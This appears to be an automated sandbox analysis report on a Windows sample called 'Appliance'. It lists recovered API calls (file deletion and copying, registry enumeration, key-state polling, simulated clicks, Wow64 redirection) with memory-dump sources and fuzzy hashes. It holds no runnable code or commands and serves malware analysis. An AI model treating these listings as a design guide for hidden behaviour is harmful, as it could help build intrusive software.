                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                            • API String ID: 145871493-2590602151
                                                                                                                                            • Opcode ID: ff518de8861bf4ea82721d3f2fc02b7df34a368393a9a90ea2bc6cc13cf9a680
                                                                                                                                            • Instruction ID: a0e68ebe8f750751ce43836309650d6da74073e06ec10ad54ded80e3f4b80d7b
                                                                                                                                            • Opcode Fuzzy Hash: ff518de8861bf4ea82721d3f2fc02b7df34a368393a9a90ea2bc6cc13cf9a680
                                                                                                                                            • Instruction Fuzzy Hash: C1E02BB080AB119FE73557214D84EED33146F10706B641559FC06F6350EB30CCC4C794
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DC668B,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC664A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DC665C
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00DC668B,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC666E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                            • API String ID: 145871493-3689287502
                                                                                                                                            • Opcode ID: 7d44ba4c1d90012475c306d57947544221299bef5bb4e41efda3768d40ca149c
                                                                                                                                            • Instruction ID: d48e500564cbe39f575f75a96268ccf18dea55fe2df3c03765d8996a9cdde498
                                                                                                                                            • Opcode Fuzzy Hash: 7d44ba4c1d90012475c306d57947544221299bef5bb4e41efda3768d40ca149c
                                                                                                                                            • Instruction Fuzzy Hash: 60E08C36646F231B92322726BC08FAEA6289F82B23B090259FD04F3240DFA0CC0585F5
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E05657,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC6610
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DC6622
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00E05657,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC6635
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                            • API String ID: 145871493-1355242751
                                                                                                                                            • Opcode ID: e4a13b4a08ce7ef546c34d5493086792738cf28e866ccc5fa64e949d28122a15
                                                                                                                                            • Instruction ID: 260af9acd2dd61cdf02acd7150a869b290d05714718946ece8aa18aec9552249
                                                                                                                                            • Opcode Fuzzy Hash: e4a13b4a08ce7ef546c34d5493086792738cf28e866ccc5fa64e949d28122a15
                                                                                                                                            • Instruction Fuzzy Hash: 6ED01736657F336B82362B36AD18ECE6B149F92F223090869B804B3154DF60CD09C6E9
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E335C4
                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00E33646
                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E3365C
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E3366D
                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E3367F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Delete$Copy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3226157194-0
                                                                                                                                            • Opcode ID: 63349875e020d52ea3214ab3167a3426b8e1b9ade660f0844b3b902b9bb18763
                                                                                                                                            • Instruction ID: 528cae3d60eccd6937585d4ba3d3c857fdba62c39d6d7745596e4ce1b37844c5
                                                                                                                                            • Opcode Fuzzy Hash: 63349875e020d52ea3214ab3167a3426b8e1b9ade660f0844b3b902b9bb18763
                                                                                                                                            • Instruction Fuzzy Hash: 6AB13D72901119ABDF15EBA5CC89EDEBBBDEF48314F0040AAF509F7151EA349A44CB71
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00E4AE87
                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E4AE95
                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E4AEC8
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00E4B09D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3488606520-0
                                                                                                                                            • Opcode ID: 372e15ae462ba53637996d1b98deb2d4072df0140bbaacbc0570963c890b2992
                                                                                                                                            • Instruction ID: 077f14c181e8209660a76120de2120519f35fb91735b5df7eddba57a41998e47
                                                                                                                                            • Opcode Fuzzy Hash: 372e15ae462ba53637996d1b98deb2d4072df0140bbaacbc0570963c890b2992
                                                                                                                                            • Instruction Fuzzy Hash: 54A191B1A04301AFE720DF24D886F2AB7E5EF44714F14885DF5999B392D771EC448BA1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00E4D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E4C10E,?,?), ref: 00E4D415
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D451
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4C8
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4FE
                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4C505
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E4C560
                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E4C5C3
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00E4C606
                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E4C613
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 826366716-0
                                                                                                                                            • Opcode ID: 0d72ed889ed60932abe5068edf0ba234129b352548039aee5eef23a6a922c68c
                                                                                                                                            • Instruction ID: e79c2cc8cef7055f55d16980ee9c63e776a11fb7979b368ea6fb869695c9f47c
                                                                                                                                            • Opcode Fuzzy Hash: 0d72ed889ed60932abe5068edf0ba234129b352548039aee5eef23a6a922c68c
                                                                                                                                            • Instruction Fuzzy Hash: BF61B331109241AFC714DF14D890F6ABBE5FF84318F54999DF05A9B292CB31ED46CBA2
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E2E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E2D7CD,?), ref: 00E2E714
                                                                                                                                              • Part of subcall function 00E2E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E2D7CD,?), ref: 00E2E72D
                                                                                                                                              • Part of subcall function 00E2EAB0: GetFileAttributesW.KERNEL32(?,00E2D840), ref: 00E2EAB1
                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00E2ED8A
                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00E2EDC3
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2EF02
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2EF1A
                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E2EF67
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3183298772-0
                                                                                                                                            • Opcode ID: 810bbb961321635848e261cf7571753b058c3939ec9e0223aea8e49e7ad90769
                                                                                                                                            • Instruction ID: 6e16053de9bfeee0d9934c0293581b12134111fa1e8ac31314017bc59ac88b69
                                                                                                                                            • Opcode Fuzzy Hash: 810bbb961321635848e261cf7571753b058c3939ec9e0223aea8e49e7ad90769
                                                                                                                                            • Instruction Fuzzy Hash: 205162B25083959BC724EBA0DC919DBB3ECEF84354F00192EF285E3151EF71A6888776
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00E29534
                                                                                                                                            • VariantClear.OLEAUT32 ref: 00E295A5
                                                                                                                                            • VariantClear.OLEAUT32 ref: 00E29604
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00E29677
                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E296A2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4136290138-0
                                                                                                                                            • Opcode ID: 59788b82bce5422be5ca3cde0851813a9ba8d35d0e5de9ddf862813e97c08806
                                                                                                                                            • Instruction ID: c9f5381e600e3987404d1e49a32fa5b6a57483cbe6ffe7eef850eed431e1b760
                                                                                                                                            • Opcode Fuzzy Hash: 59788b82bce5422be5ca3cde0851813a9ba8d35d0e5de9ddf862813e97c08806
                                                                                                                                            • Instruction Fuzzy Hash: C85149B5A00219AFCB14CF59D884AAAB7F9FF89314F158559E91AEB310E730E911CB90
                                                                                                                                            APIs
                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E395F3
                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00E3961F
                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E39677
                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E3969C
                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E396A4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                            • Opcode ID: 5126571a69765b2ffd40f0c05dfd96e7dcdf17e5485842f31ab5cdb1fc33797e
                                                                                                                                            • Instruction ID: 003a3c8ce69c5668981f3a6262160770d59b1011919d2decb9d8c9bb3525f728
                                                                                                                                            • Opcode Fuzzy Hash: 5126571a69765b2ffd40f0c05dfd96e7dcdf17e5485842f31ab5cdb1fc33797e
                                                                                                                                            • Instruction Fuzzy Hash: 18512B35A00215AFCF15DF65C885E6ABBF5FF48314F048458E849AB362CB75ED45CBA0
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00E4999D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00E49A2D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E49A49
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00E49A8F
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00E49AAF
                                                                                                                                              • Part of subcall function 00DDF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00E31A02,?,753CE610), ref: 00DDF9F1
                                                                                                                                              • Part of subcall function 00DDF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E20354,00000000,00000000,?,?,00E31A02,?,753CE610,?,00E20354), ref: 00DDFA18
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 666041331-0
                                                                                                                                            • Opcode ID: 72a2117c5b14988892492b840744b746690940e3eed03cdec3c84763b1eb2386
                                                                                                                                            • Instruction ID: e04cedef611d8647afdaff0e58be6dd224df3bcc02b9c1b189c20025e5cc334a
                                                                                                                                            • Opcode Fuzzy Hash: 72a2117c5b14988892492b840744b746690940e3eed03cdec3c84763b1eb2386
                                                                                                                                            • Instruction Fuzzy Hash: A3515D35604205DFCB10DF64C485D9EBBB0FF49318B059199E90AAB762DB31ED85CFA1
                                                                                                                                            APIs
                                                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E5766B
                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00E57682
                                                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E576AB
                                                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00E3B5BE,00000000,00000000), ref: 00E576D0
                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E576FF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3688381893-0
                                                                                                                                            • Opcode ID: 4be209456a1d580a5d4bb27585bdcd9d07cdd9b0541b828986d8d607317ee678
                                                                                                                                            • Instruction ID: 64f47d418657dcc1093d3ff363410abdc96acd18cf432a05a6ea2773074081ff
                                                                                                                                            • Opcode Fuzzy Hash: 4be209456a1d580a5d4bb27585bdcd9d07cdd9b0541b828986d8d607317ee678
                                                                                                                                            • Instruction Fuzzy Hash: 3D412735A08604AFCB29CF2CEC48FA57BA5EB09355F051655FC89B72E0C7B0ED68CA50
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            • Opcode ID: 726e40e581f44fd07104aef2cec77be1a4cb439caa9df5c2e1b4548d031109f1
                                                                                                                                            • Instruction ID: 03c0f4a025c4a5f925d049f04357f90ca9b3c6e466b908a61d337faf8ff5233e
                                                                                                                                            • Opcode Fuzzy Hash: 726e40e581f44fd07104aef2cec77be1a4cb439caa9df5c2e1b4548d031109f1
                                                                                                                                            • Instruction Fuzzy Hash: 2E41C332A002049FCB20DF78C881A79B7E5EF88314F168568EA15EB395D671ED01CBA0
                                                                                                                                            APIs
                                                                                                                                            • GetCursorPos.USER32(?), ref: 00DC19E1
                                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00DC19FE
                                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00DC1A23
                                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00DC1A3D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4210589936-0
                                                                                                                                            • Opcode ID: 8bc889b6d7f16243d1eb3e5daac33b63a3fb1cb78ee4b15d4708de0e2eeb9018
                                                                                                                                            • Instruction ID: 73627aff11235a34ca6dc7e9b0b4d63b64789955ed6cf9316a84b76974264982
                                                                                                                                            • Opcode Fuzzy Hash: 8bc889b6d7f16243d1eb3e5daac33b63a3fb1cb78ee4b15d4708de0e2eeb9018
                                                                                                                                            • Instruction Fuzzy Hash: 72419275A0521AFFDF159F64C844BEEB774FB09324F20421AE469A32D0C7305A95CB61
                                                                                                                                            APIs
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00E22262
                                                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 00E2230E
                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00E22316
                                                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00E22327
                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E2232F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3382505437-0
                                                                                                                                            • Opcode ID: a801e8ea436e9d7550f40b4f336d7c0f4223c07296b76c08355c77b7474acead
                                                                                                                                            • Instruction ID: 81d3647ea542071957343cb64bd9b3754e6fbed1d2e993e224a2b1567e88419b
                                                                                                                                            • Opcode Fuzzy Hash: a801e8ea436e9d7550f40b4f336d7c0f4223c07296b76c08355c77b7474acead
                                                                                                                                            • Instruction Fuzzy Hash: 0131D672900219EFDB14CFA8DD89ADE3BB5EB04315F104619FA25F72E0C7B0A944DB91
                                                                                                                                            APIs
